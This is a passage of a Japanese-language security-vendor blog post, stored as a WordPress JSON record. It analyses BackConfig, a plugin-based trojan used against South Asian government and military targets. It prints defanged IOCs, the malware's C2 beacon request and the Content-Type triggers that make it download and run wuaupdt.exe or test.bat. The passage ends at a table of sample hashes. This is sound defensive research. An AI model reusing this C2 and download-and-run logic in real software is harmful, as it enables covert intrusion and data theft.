{"id":107263,"date":"2020-05-14T23:40:12","date_gmt":"2020-05-15T06:40:12","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=107263"},"modified":"2020-05-14T23:41:33","modified_gmt":"2020-05-15T06:41:33","slug":"updated-backconfig-malware-targeting-government-and-military-organizations","status":"publish","type":"post","link":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/","title":{"rendered":"\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2"},"content":{"rendered":"<h2>\u6982\u8981<\/h2>\n<p>Unit 42\u306f\u3001Hangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7(\u5225\u540d\u3001Neon\u3001Viceroy Tiger\u3001MONSOON)\u304c\u4f7f\u7528\u3059\u308b<a href=\"https:\/\/ti.360.net\/blog\/articles\/donot-group-is-targeting-pakistani-businessman-working-in-china-en\/\">BackConfig<\/a>\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u95a2\u9023\u3059\u308b\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u3001\u904e\u53bb4\u304b\u6708\u9593\u306b\u308f\u305f\u3063\u3066\u89b3\u5bdf\u3057\u307e\u3057\u305f\u3002\u73fe\u5730\u306e\u6642\u4e8b\u554f\u984c\u3092\u30eb\u30a2\u30fc\u3068\u3057\u3066\u4f7f\u7528\u3059\u308b\u3053\u306e\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u6a19\u7684\u306b\u306f\u3001\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3084\u8ecd\u4e8b\u65bd\u8a2d\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n<p>\u30ab\u30b9\u30bf\u30de\u30a4\u30ba\u3055\u308c\u305f\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3067\u3042\u308bBackConfig\u306f\u3001\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3084\u30ad\u30fc\u30ed\u30ae\u30f3\u30b0\u60c5\u5831\u3092\u53ce\u96c6\u3059\u308b\u6a5f\u80fd\u3001\u4ed6\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3066\u5b9f\u884c\u3059\u308b\u6a
5f\u80fd\u306a\u3069\u3001\u3055\u307e\u3056\u307e\u306a\u6a5f\u80fd\u3092\u63d0\u4f9b\u3059\u308b\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3092\u4f7f\u7528\u3067\u304d\u308b\u3001\u67d4\u8edf\u306a\u30d7\u30e9\u30b0\u30a4\u30f3\u30a2\u30fc\u30ad\u30c6\u30af\u30c1\u30e3\u3092\u5099\u3048\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u6700\u521d\u306e\u611f\u67d3\u306f\u3001\u4fb5\u5bb3\u3055\u308c\u305f\u6b63\u5f53\u306aWeb\u30b5\u30a4\u30c8\u304b\u3089\u5175\u5668\u5316\u3055\u308c\u305fMicrosoft Excel (XLS)\u6587\u66f8\u304c\u914d\u4fe1\u3055\u308c\u308b\u3053\u3068\u3067\u767a\u751f\u3057\u307e\u3059\u3002\u3053\u306eWeb\u30b5\u30a4\u30c8\u306eURL\u306f\u3001\u591a\u304f\u306e\u5834\u5408\u3001\u96fb\u5b50\u30e1\u30fc\u30eb\u3067\u4f1d\u3048\u3089\u308c\u307e\u3059\u3002\u3053\u306e\u6587\u66f8\u306f\u3001Visual Basic for Applications (VBA)\u306e\u30de\u30af\u30ed\u30b3\u30fc\u30c9\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u88ab\u5bb3\u7aef\u672b\u3067\u30de\u30af\u30ed\u304c\u6709\u52b9\u306a\u5834\u5408\u3001\u3053\u306e\u30de\u30af\u30ed\u30b3\u30fc\u30c9\u306f\u3001\u8907\u6570\u306e\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3067\u69cb\u6210\u3055\u308c\u308b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u30d7\u30ed\u30bb\u30b9\u3092\u958b\u59cb\u3057\u3066\u3001\u30d7\u30e9\u30b0\u30a4\u30f3 \u30ed\u30fc\u30c0\u30fc 
\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066\u5b9f\u884c\u3057\u307e\u3059\u3002\u30e2\u30b8\u30e5\u30fc\u30eb\u65b9\u5f0f\u306e\u5834\u5408\u3001\u78ba\u5b9f\u306b\u500b\u3005\u306e\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u306e\u5909\u66f4\u306b\u304b\u304b\u308b\u6642\u9593\u304c\u77ed\u7e2e\u3055\u308c\u307e\u3059\u3002\u3055\u3089\u306b\u3001\u653b\u6483\u8005\u306b\u3068\u3063\u3066\u3088\u308a\u91cd\u8981\u306a\u3053\u3068\u3068\u3057\u3066\u3001\u7279\u306b\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3092\u5206\u96e2\u3057\u3066\u5206\u6790\u3059\u308b\u969b\u306b\u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u3084\u52d5\u7684\u5206\u6790\u306e\u30b7\u30b9\u30c6\u30e0\u3092\u59a8\u5bb3\u3067\u304d\u308b\u65b9\u6cd5\u3067\u3001\u60aa\u610f\u306e\u3042\u308b\u52d5\u4f5c\u304c\u5206\u5272\u3055\u308c\u307e\u3059\u3002<\/p>\n<p><a href=\"https:\/\/www.paloaltonetworks.com\/products\/secure-the-network\/wildfire\">WildFire<\/a>\u3092\u5099\u3048\u305f\u5f0a\u793e\u306e<a href=\"https:\/\/www.paloaltonetworks.com\/products\/secure-the-network\/subscriptions\/threat-prevention\">\u8105\u5a01\u9632\u5fa1<\/a>\u30d7\u30e9\u30c3\u30c8\u30d5\u30a9\u30fc\u30e0\u306f\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306b\u95a2\u9023\u3059\u308b\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u691c\u51fa\u3059\u308b\u3068\u540c\u6642\u306b\u3001\u8b58\u5225\u3055\u308c\u305f\u60aa\u610f\u306e\u3042\u308b\u30c9\u30e1\u30a4\u30f3\u3084\u4fb5\u5bb3\u3055\u308c\u305f\u30c9\u30e1\u30a4\u30f3\u306b\u3064\u3044\u3066\u3001PAN-DB <a 
href=\"https:\/\/www.paloaltonetworks.com\/products\/threat-detection-and-prevention\/web-security\">URL\u30d5\u30a3\u30eb\u30bf\u30ea\u30f3\u30b0<\/a>\u30bd\u30ea\u30e5\u30fc\u30b7\u30e7\u30f3\u5185\u3067\u300c\u30de\u30eb\u30a6\u30a7\u30a2\u300d\u30ab\u30c6\u30b4\u30ea\u3092\u66f4\u65b0\u3057\u307e\u3059\u3002<\/p>\n<p>\u3053\u306e\u8abf\u67fb\u306b\u95a2\u9023\u3059\u308bIOC\u306f\u3001\u3053\u306e\u30ec\u30dd\u30fc\u30c8\u306e\u6700\u5f8c\u306b\u8a18\u8f09\u3059\u308b\u307b\u304b\u3001<a href=\"https:\/\/pan-unit42.github.io\/playbook_viewer\/?pb=hangover\">Unit 42\u306ePlaybook Viewer<\/a>\u304b\u3089\u30a2\u30af\u30bb\u30b9\u3067\u304d\u308b\u300eAdversary Playbook (\u653b\u6483\u8005\u306e\u30d7\u30ec\u30a4\u30d6\u30c3\u30af)\u300f\u306eHangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u9805\u76ee\u306b\u3082\u8a18\u8f09\u3057\u307e\u3059\u3002<\/p>\n<h3>\u51fa\u767a\u70b9<\/h3>\n<p>Unit 42\u304cWindows PE\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb(SHA256: 84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c)\u306b\u95a2\u9023\u3059\u308b\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u6700\u521d\u306b\u78ba\u8a8d\u3057\u305f\u306e\u306f\u3001\u6ce8\u76ee\u3057\u3066\u3044\u305f\u7279\u5b9a\u306e\u5206\u91ce\u3068\u56fd\u306b\u95a2\u9023\u3059\u308bAutoFocus\u30c7\u30fc\u30bf\u3092\u691c\u7d22\u3057\u3066\u3044\u308b\u3068\u304d\u3067\u3057\u305f\u3002<\/p>\n<p>\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u6700\u521d\u306b\u78ba\u8a8d\u3057\u305f\u306e\u306f2020\u5e741\u670819\u65e5\u3067\u3059\u304c\u3001\u308f\u305a\u304b\u6570\u5206\u306e\u9593\u306b2\u3064\u306e\u7d44\u7e54\u3001\u3059\u306a\u308f\u3061\u3042\u308b\u56fd\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u5225\u306e\u56fd\u306e\u8ecd\u4e8b\u65bd\u8a2d\u306b\u3088\u3063\u3066\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u307e\u3057\u305f\u3002\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u5143\u306f\u3001http:\/\/212.114.52[.]148\/request\/httpsrequest\u3067\u3042\u308a\u3001httpsrequest\u30d5
\u30a1\u30a4\u30eb\u306fdphc.exe\u3068\u3057\u3066\u30ed\u30fc\u30ab\u30eb\u306b\u4fdd\u5b58\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u914d\u4fe1\u65b9\u6cd5\u306e\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001\u672c\u7a3f\u5f8c\u534a\u3067\u8aac\u660e\u3057\u307e\u3059\u3002<\/p>\n<p>\u3053\u306e\u3068\u304d\u306e(\u4ed6\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u5834\u5408\u306b\u3064\u3044\u3066\u306f\u5f8c\u8ff0) BackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u914d\u4fe1\u3059\u308b\u969b\u306eURL\u30d1\u30b9\u3084\u30d5\u30a1\u30a4\u30eb\u540d\u306b\u9078\u629e\u3055\u308c\u305f\u7528\u8a9e\u306f\u3001\u660e\u3089\u304b\u306b\u7121\u5bb3\u3067\u3042\u308b\u3053\u3068\u3092\u601d\u308f\u305b\u308b\u30aa\u30da\u30ec\u30fc\u30b7\u30e7\u30f3\u3001\u30d1\u30b9\u3001\u30d5\u30a1\u30a4\u30eb\u540d\u306b\u306a\u3063\u3066\u304a\u308a\u3001\u30b9\u30da\u30eb\u3053\u305d\u7570\u306a\u308b\u3082\u306e\u306e\u3001\u540c\u30da\u30a4\u30ed\u30fc\u30c9\u304cDHCP\u30cd\u30c3\u30c8\u30ef\u30fc\u30ad\u30f3\u30b0\u30b5\u30fc\u30d3\u30b9\u95a2\u9023\u3067\u3042\u308b\u304b\u306e\u3088\u3046\u306b\u898b\u305b\u304b\u3051\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u76ee\u7684\u306f\u3001\u653b\u6483\u8005\u304c\u3001\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3059\u308b\u3053\u3068\u3001\u30a8\u30f3\u30c9\u30dd\u30a4\u30f3\u30c8 
\u30b7\u30b9\u30c6\u30e0\u4e0a\u3067\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u30d0\u30c3\u30c1\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3059\u308b\u3053\u3068\u3067\u3059\u3002<\/p>\n<p>\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u306b\u306f\u3001\u5404\u6587\u5b57\u304b\u30896\u3092\u6e1b\u7b97\u3057\u3066\u300c\u5fa9\u53f7\u300d\u3059\u308b\u30ab\u30b9\u30bf\u30e0\u30eb\u30fc\u30c1\u30f3\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u65b9\u6cd5\u3067\u5fa9\u53f7\u3057\u305f\u6587\u5b57\u5217\u3092\u4ee5\u4e0b\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">linkrequest[.]live<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">\\\\Adobe\\\\Driver\\\\dwg\\\\pid.txt<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">\\\\Adobe\\\\Driver\\\\dwg\\\\<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, 
monospace;\">\\\\Adobe\\\\Driver\\\\dwg\\\\wuaupdt.exe<\/span><\/li>\n<\/ul>\n<p>\u3053\u306e\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306f\u3001\u4ee5\u4e0b\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u8aad\u307f\u8fbc\u3093\u3067\u3001C2\u30d3\u30fc\u30b3\u30f3\u306eURL\u3067\u4f7f\u7528\u3057\u307e\u3059\u3002\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u304c\u5b58\u5728\u3057\u306a\u3044\u5834\u5408\u3001\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306f\u305d\u308c\u4ee5\u4e0a\u4f55\u3082\u3057\u306a\u3044\u3067\u7d42\u4e86\u3057\u307e\u3059\u3002pid.txt\u30d5\u30a1\u30a4\u30eb\u306f\u3001\u5175\u5668\u5316\u3055\u308c\u305fExcel\u6587\u66f8\u3067\u958b\u59cb\u3055\u308c\u308b\u521d\u671f\u306e\u914d\u4fe1\u3068\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u306e\u6bb5\u968e\u3067\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u30bb\u30c3\u30c8\u30a2\u30c3\u30d7\u30d7\u30ed\u30bb\u30b9\u306e\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001\u5f8c\u8ff0\u3059\u308b\u914d\u4fe1\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u8aac\u660e\u3057\u307e\u3059\u3002\u524d\u8ff0\u3057\u305f\u3088\u3046\u306b\u3001\u3053\u306e\u52d5\u4f5c\u306b\u3088\u3063\u3066\u3001\u500b\u3005\u306e\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u306e\u81ea\u52d5\u5206\u6790\u304c\u56f0\u96e3\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">%USERPROFILE%\\Adobe\\Driver\\dwg\\pid.txt<\/span><\/li>\n<\/ul>\n<p>HttpOpenRequestA\u95a2\u6570\u3092\u547c\u3073\u51fa\u3059\u969b\u306bINTERNET_FLAG_SECURE\u30d5\u30e9\u30b0\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u3067\u3001C2\u30c1\u30e3\u30cd\u30eb\u306fHTTPS\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u30d3\u30fc\u30b3\u30f3\u306eHTTP\u30ea\u30af\u30a8\u30b9\u30c8\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, 
monospace;\">GET \/orderme\/<strong>[contents of pid.txt file]<\/strong> HTTP\/1.1<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\/20100101 Firefox\/52.0 @\/NEW<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">Host: linkrequest[.]live <strong>[resolving to 23.106.123[.]87]<\/strong><\/span><\/p>\n<p>\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306f\u3001HTTP\u30ec\u30b9\u30dd\u30f3\u30b9\u30d8\u30c3\u30c0\u30fc\u3067\u3001\u4ee5\u4e0b\u306e\u30d5\u30a3\u30fc\u30eb\u30c9\u3068\u5024\u3092\u63a2\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">\"Content-Type: application\"<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">\"Content-Type: xDvsds\"<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">\"Content-Type: Bw11eW\"<\/span><\/li>\n<\/ul>\n<p>content-type\u30d5\u30a3\u30fc\u30eb\u30c9\u306e\u5024\u304capplication\u3067\u3042\u308b\u5834\u5408\u3001\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306f\u3001HTTP\u30ec\u30b9\u30dd\u30f3\u30b9\u30d8\u30c3\u30c0\u30fc\u306e\u6587\u5b57\u5217filename\u3068Content-Transfer-Encoding\u306e\u9593\u304b\u3089\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u62bd\u51fa\u3057\u307e\u3059\u3002\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u4f7f\u7528\u3057\u3066\u3001%USERPROFILE%\\Adobe\\Driver\\dwg\\\u30d5\u30a9\u30eb\u30c0\u306b\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u306b\u306f\u3001HTTP\u30ec\u30b9\u30dd\u30f3\u30b9\u306e\u30c7\u30fc\u30bf\u3092\u66f8\u304d\u8fbc\u307f\u307e\u3059\u3002\u4ed6\u306e2\u3064\u306eContent-Type\u304b\u3089\u5224\u65ad\u3057\u3066\u3001\u63d0\u4f9b\u3055\u308c\u308b\u540d\u524d\u306f\u300cwuaupdt.exe\u300d\u307e\u305f\u306f\u300ctest.bat\u300d\u3067\u3042\u308b\u3068\u79c1\u305f\u3061\u306f\u78ba\u4fe1\u3057\u3066\u3
044\u307e\u3059\u3002<\/p>\n<p>content-type\u30d5\u30a3\u30fc\u30eb\u30c9\u306e\u5024\u304cxDvsds\u3067\u3042\u308b\u5834\u5408\u3001\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306f\u3001ShellExecuteA\u3068\u300copen\u300d\u30e1\u30bd\u30c3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u3001\u4ee5\u4e0b\u306e\u30d5\u30a1\u30a4\u30eb\u306e\u5b9f\u884c\u3092\u8a66\u307f\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">%USERPROFILE%\\Adobe\\Driver\\dwg\\wuaupdt.exe<\/span><\/p>\n<p>content-type\u30d5\u30a3\u30fc\u30eb\u30c9\u306e\u5024\u304cBw11eW\u3067\u3042\u308b\u5834\u5408\u3001\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306f\u3001ShellExecuteA\u3068\u300copen\u300d\u30e1\u30bd\u30c3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u3001\u4ee5\u4e0b\u306e\u30d5\u30a1\u30a4\u30eb\u306e\u5b9f\u884c\u3092\u8a66\u307f\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">%USERPROFILE%\\Adobe\\Driver\\dwg\\test.bat<\/span><\/p>\n<p>\u3053\u306e\u30ec\u30dd\u30fc\u30c8\u306e\u57f7\u7b46\u6642\u70b9\u3067\u306fC2\u306f\u64cd\u4f5c\u4e0d\u80fd\u306b\u306a\u3063\u3066\u3044\u308b\u3089\u3057\u304f\u3001\u305d\u308c\u4ee5\u4e0a\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u78ba\u8a8d\u3055\u308c\u307e\u305b\u3093\u3067\u3057\u305f\u3002\u5f0a\u793e\u306f\u3001\u7d50\u679c\u3068\u3057\u3066\u5f97\u3089\u308c\u305fwuaupdt.exe\u30d5\u30a1\u30a4\u30eb\u304c\u3001\u305d\u308c\u4ee5\u964d\u306e\u60c5\u5831\u7a83\u53d6\u6a5f\u80fd\u3084\u30ad\u30fc\u30b9\u30c8\u30ed\u30fc\u30af\u8a18\u9332\u6a5f\u80fd\u3092\u63d0\u4f9b\u3057\u3066\u3044\u308b\u3053\u3068\u3001\u305d\u3057\u3066Qihoo 360\u8105\u5a01\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u30b0\u30eb\u30fc\u30d7\u304c\u904e\u53bb\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u8abf\u67fb\u7d50\u679c(<a 
href=\"https:\/\/ti.360.net\/blog\/articles\/donot-group-is-targeting-pakistani-businessman-working-in-china-en\/\">\u3053\u3061\u3089\u3092\u53c2\u7167<\/a>)\u3067\u8aac\u660e\u3057\u3066\u3044\u308b\u3088\u3046\u306b\u3001\u4ed6\u306e\u30b3\u30de\u30f3\u30c9\u3092\u81ea\u3089\u5b9f\u884c\u3057\u3066\u3044\u308b\u304b\u3001\u307e\u305f\u306f\u30d7\u30e9\u30b0\u30a4\u30f3\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066\u5b9f\u884c\u3055\u305b\u3066\u3044\u308b\u3053\u3068\u3092\u78ba\u4fe1\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>Unit 42\u306f\u3001\u591a\u6570\u306eBackConfig\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306b\u5bfe\u3057\u3066\u5927\u96d1\u628a\u306a\u30d0\u30a4\u30ca\u30ea\u6bd4\u8f03\u3092\u5b9f\u65bd\u3057\u307e\u3057\u305f\u304c\u3001\u91cd\u8907\u3057\u3066\u3044\u308b\u975e\u30e9\u30a4\u30d6\u30e9\u30ea\u95a2\u6570\u306f\u898b\u3064\u304b\u308a\u307e\u305b\u3093\u3067\u3057\u305f\u3002\u3053\u306e\u3053\u3068\u306f\u3001<a href=\"https:\/\/www.netscout.com\/blog\/asert\/donot-team-leverages-new-modular-malware-framework-south-asia\">\u3053\u3061\u3089<\/a>\u3084<a href=\"https:\/\/labs.bitdefender.com\/2017\/09\/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit\/\">\u3053\u3061\u3089<\/a>\u3067\u8aac\u660e\u3055\u308c\u3066\u3044\u308b\u3088\u3046\u306b\u3001\u305d\u308c\u3089\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u304cYTY\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u307e\u305f\u306fEHDev\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u306b\u57fa\u3065\u304f\u3082\u306e\u3067\u3042\u308b\u3053\u3068\u3092\u793a\u5506\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<h3>PE\u30e1\u30bf\u30c7\u30fc\u30bf<\/h3>\n<p>\u30de\u30eb\u30a6\u30a7\u30a2\u30b5\u30f3\u30d7\u30eb\u306b\u306f\u3001\u30ab\u30ea\u30d5\u30a9\u30eb\u30cb\u30a2\u306b\u62e0\u70b9\u3092\u7f6e\u304fFoxit 
Software\u88fd\u306e\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u3092\u88c5\u3046\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u7f72\u540d\u306b\u4f7f\u7528\u3055\u308c\u308b\u81ea\u5df1\u7f72\u540d\u30c7\u30b8\u30bf\u30eb\u8a3c\u660e\u66f8\u306a\u3069\u3001\u3044\u304f\u3064\u304b\u306e\u8208\u5473\u6df1\u3044\u9759\u7684\u30a2\u30fc\u30c6\u30a3\u30d5\u30a1\u30af\u30c8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u8005\u304c\u3053\u306e\u4f01\u696d\u3084\u88681\u306b\u793a\u3059\u4ed6\u306e\u4f01\u696d\u306b\u6210\u308a\u3059\u307e\u3059\u3053\u3068\u3092\u9078\u629e\u3057\u305f\u7406\u7531\u306f\u4e0d\u660e\u3067\u3059\u304c\u3001\u524d\u8ff0\u3057\u305f\u3088\u3046\u306b\u3001\u30d5\u30a1\u30a4\u30eb\u540d\u3068URL\u306e\u4f7f\u3044\u65b9\u306f\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u5b89\u5168\u3067\u4fe1\u983c\u3067\u304d\u308b\u3082\u306e\u3067\u3042\u308b\u3088\u3046\u306b\u601d\u308f\u305b\u307e\u3059\u3002<\/p>\n<p>Unit 42\u306f\u3001\u3053\u306e\u30e1\u30bf\u30c7\u30fc\u30bf\u3068\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306e\u8abf\u67fb\u304b\u3089\u53ce\u96c6\u3057\u305f\u60c5\u5831\u3092\u7d44\u307f\u5408\u308f\u305b\u3066\u3001AutoFocus\u30c7\u30fc\u30bf\u3092\u4e2d\u5fc3\u306b\u8abf\u67fb\u3092\u9032\u3081\u308b\u3053\u3068\u3067\u3001\u3055\u307e\u3056\u307e\u306aBackConfig 
PE\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u30b5\u30f3\u30d7\u30eb\u3092\u898b\u3064\u3051\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u904e\u53bb12\u304b\u6708\u306b\u53ce\u96c6\u3057\u305f\u30b5\u30f3\u30d7\u30eb\u3092\u4ee5\u4e0b\u306e\u88681\u3068\u88682\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>SHA256<\/strong><\/td>\n<td><strong>\u30b3\u30f3\u30d1\u30a4\u30eb\u65e5\u6642(UTC)<\/strong><\/td>\n<td><strong>\u521d\u56de\u89b3\u6e2c\u65e5\u6642(<\/strong><strong>\u592a\u5e73\u6d0b\u6642\u9593)<\/strong><\/td>\n<td><strong>\u7f72\u540d\u8005<\/strong><\/td>\n<\/tr>\n<tr>\n<td>84e5629\u2026<\/td>\n<td>01\/20\/2020 7:26:09am<\/td>\n<td>01\/19\/2020 11:49:03pm<\/td>\n<td rowspan=\"2\">Foxit Software Incorporated<\/td>\n<\/tr>\n<tr>\n<td>18ce3ee\u2026<\/td>\n<td>10\/10\/2019 9:22:11am<\/td>\n<td>01\/16\/2020 4:30:26pm<\/td>\n<\/tr>\n<tr>\n<td>4a4bc01\u2026<\/td>\n<td>11\/21\/2019 9:19:49am<\/td>\n<td>01\/16\/2020 1:31:46am<\/td>\n<td rowspan=\"3\">wind0ws<\/td>\n<\/tr>\n<tr>\n<td>91c67c1\u2026<\/td>\n<td>11\/21\/2019 9:19:49am<\/td>\n<td>12\/02\/2019 2:03:41am<\/td>\n<\/tr>\n<tr>\n<td>de5b670\u2026<\/td>\n<td>11\/21\/2019 9:19:49am<\/td>\n<td>11\/21\/2019 11:59:05pm<\/td>\n<\/tr>\n<tr>\n<td>f79ebf0\u2026<\/td>\n<td>10\/28\/2019 5:35:26am<\/td>\n<td>11\/09\/2019 10:32:09pm<\/td>\n<td>NVIDIA Corporation<\/td>\n<\/tr>\n<tr>\n<td>31faeef\u2026<\/td>\n<td>10\/10\/2019 9:22:11am<\/td>\n<td>10\/13\/2019 10:11:04pm<\/td>\n<td>Foxit Software Incorporated<\/td>\n<\/tr>\n<tr>\n<td>d87b875\u2026<\/td>\n<td>09\/12\/2019 5:54:04am<\/td>\n<td>09\/26\/2019 9:32:19am<\/td>\n<td>Digicert Global<\/td>\n<\/tr>\n<tr>\n<td>1510996\u2026<\/td>\n<td>12\/05\/2018 4:35:03am<\/td>\n<td>04\/09\/2019 10:30:16am<\/td>\n<td>Foxit Software Incorporated<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><em>\u88681. 
